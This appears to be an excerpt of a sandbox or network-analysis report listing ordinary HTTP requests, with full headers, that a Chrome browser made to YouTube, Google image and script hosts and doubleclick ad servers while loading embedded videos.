Source: global trafficHTTP traffic detected: GET /vi/LiEQ_JV0h4w/sddefault.jpg HTTP/1.1Host: i.ytimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /vi_webp/vs01gUJV3iQ/sddefault.webp HTTP/1.1Host: i.ytimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.youtube.comX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /vi/hOPpxvP2E28/sddefault.jpg?sqp=-oaymwEmCIAFEOAD8quKqQMa8AEB-AH-CYAC0AWKAgwIABABGGUgWyhIMA8=&rs=AOn4CLB1pwsAn0qkJuzQscocunfjgcf4QA HTTP/1.1Host: i.ytimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pagead/id HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.youtube.comX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /vi/QJ96N5lUn0c/sddefault.jpg HTTP/1.1Host: i.ytimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /vi_webp/Jo_coLYPcOQ/sddefault.webp HTTP/1.1Host: i.ytimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/player/26636eff/player_ias.vflset/en_US/remote.js HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/embed/Jo_coLYPcOQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=-EWOd4YpAz4; VISITOR_INFO1_LIVE=Ue1nfRIjFOk; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgGQ%3D%3D
Source: global trafficHTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.youtube.comX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /generate_204?PbnCvA HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.youtube.com/embed/-PcNMUQloeUAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=-EWOd4YpAz4; VISITOR_INFO1_LIVE=Ue1nfRIjFOk; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgGQ%3D%3D
Source: global trafficHTTP traffic detected: GET /generate_204?uSqoUA HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.youtube.com/embed/erCmtRLIjD8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=-EWOd4YpAz4; VISITOR_INFO1_LIVE=Ue1nfRIjFOk; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgGQ%3D%3D
Source: global trafficHTTP traffic detected: GET /pagead/id HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.youtube.comX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /generate_204?W8PEvg HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.youtube.com/embed/xFzWNmILl40Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=-EWOd4YpAz4; VISITOR_INFO1_LIVE=Ue1nfRIjFOk; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgGQ%3D%3D
Source: global trafficHTTP traffic detected: GET /generate_204?sKOMzw HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.youtube.com/embed/kG5xyR1406IAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=-EWOd4YpAz4; VISITOR_INFO1_LIVE=Ue1nfRIjFOk; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgGQ%3D%3D
Source: global trafficHTTP traffic detected: GET /s/player/b0557ce3/www-embed-player.vflset/www-embed-player.js HTTP/1.1Host: www.youtube.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/player/26636eff/player_ias.vflset/en_US/embed.js HTTP/1.1Host: www.youtube.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/player/26636eff/www-embed-player.vflset/www-embed-player.js HTTP/1.1Host: www.youtube.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/player/b0557ce3/player_ias.vflset/en_US/base.js HTTP/1.1Host: www.youtube.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /generate_204?PF7YLQ HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.youtube.com/embed/LiEQ_JV0h4wAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=-EWOd4YpAz4; VISITOR_INFO1_LIVE=Ue1nfRIjFOk; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgGQ%3D%3D
Source: global trafficHTTP traffic detected: GET /generate_204?Q1N9AA HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.youtube.com/embed/vs01gUJV3iQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=-EWOd4YpAz4; VISITOR_INFO1_LIVE=Ue1nfRIjFOk; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgGQ%3D%3D
Source: global trafficHTTP traffic detected: GET /generate_204?E9jUnA HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.youtube.com/embed/hOPpxvP2E28Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=-EWOd4YpAz4; VISITOR_INFO1_LIVE=Ue1nfRIjFOk; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgGQ%3D%3D
Source: global trafficHTTP traffic detected: GET /generate_204?ooNuGg HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.youtube.com/embed/QJ96N5lUn0cAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=-EWOd4YpAz4; VISITOR_INFO1_LIVE=Ue1nfRIjFOk; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgGQ%3D%3D
Source: global trafficHTTP traffic detected: GET /generate_204?z9VDUw HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.youtube.com/embed/Jo_coLYPcOQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=-EWOd4YpAz4; VISITOR_INFO1_LIVE=Ue1nfRIjFOk; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgGQ%3D%3D
Source: global trafficHTTP traffic detected: GET /s/player/26636eff/player_ias.vflset/en_US/base.js HTTP/1.1Host: www.youtube.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /vi/-PcNMUQloeU/sddefault.jpg HTTP/1.1Host: i.ytimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/player/b0557ce3/player_ias.vflset/en_US/remote.js HTTP/1.1Host: www.youtube.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/th/KZ9qBfv2Fvj8--thF3jkrqmjFIXwxVfodGy5wvrcirQ.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=517=Ulq4W_fVF31lrJx3QbjNJ1B4W2aqzxvLJE4fe3kzt29nybxiVCdsT4QMq_gKV-110pq7d7AjWQCXpIYK2Z7i871eo9sbQlwJHv2bEttmZhXw255R8WYx56xA1oXC3bu_SoRNpVGSu4VM5mODezk3D3S9OgaQ7Bt2S3zbffXFjVkdr2w_i7EAjfpymQ
Source: global trafficHTTP traffic detected: GET /kX-vYQ9Gn6TcX7ke5nWkheWbQUMzZEQn1dyzA-bRdJ3yC6h_jbggZ0PleqthkW2AGlTADqSrSg=s68-c-k-c0x00ffffff-no-rj HTTP/1.1Host: yt3.ggpht.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /instream/ad_status.js HTTP/1.1Host: static.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /vi_webp/erCmtRLIjD8/sddefault.webp HTTP/1.1Host: i.ytimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /vi/xFzWNmILl40/sddefault.jpg HTTP/1.1Host: i.ytimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=517=Ulq4W_fVF31lrJx3QbjNJ1B4W2aqzxvLJE4fe3kzt29nybxiVCdsT4QMq_gKV-110pq7d7AjWQCXpIYK2Z7i871eo9sbQlwJHv2bEttmZhXw255R8WYx56xA1oXC3bu_SoRNpVGSu4VM5mODezk3D3S9OgaQ7Bt2S3zbffXFjVkdr2w_i7EAjfpymQ
Source: global trafficHTTP traffic detected: GET /youtubei/v1/log_event?alt=json&key=AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8 HTTP/1.1Host: www.youtube.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /vi_webp/vs01gUJV3iQ/sddefault.webp HTTP/1.1Host: i.ytimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /vi_webp/kG5xyR1406I/sddefault.webp HTTP/1.1Host: i.ytimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
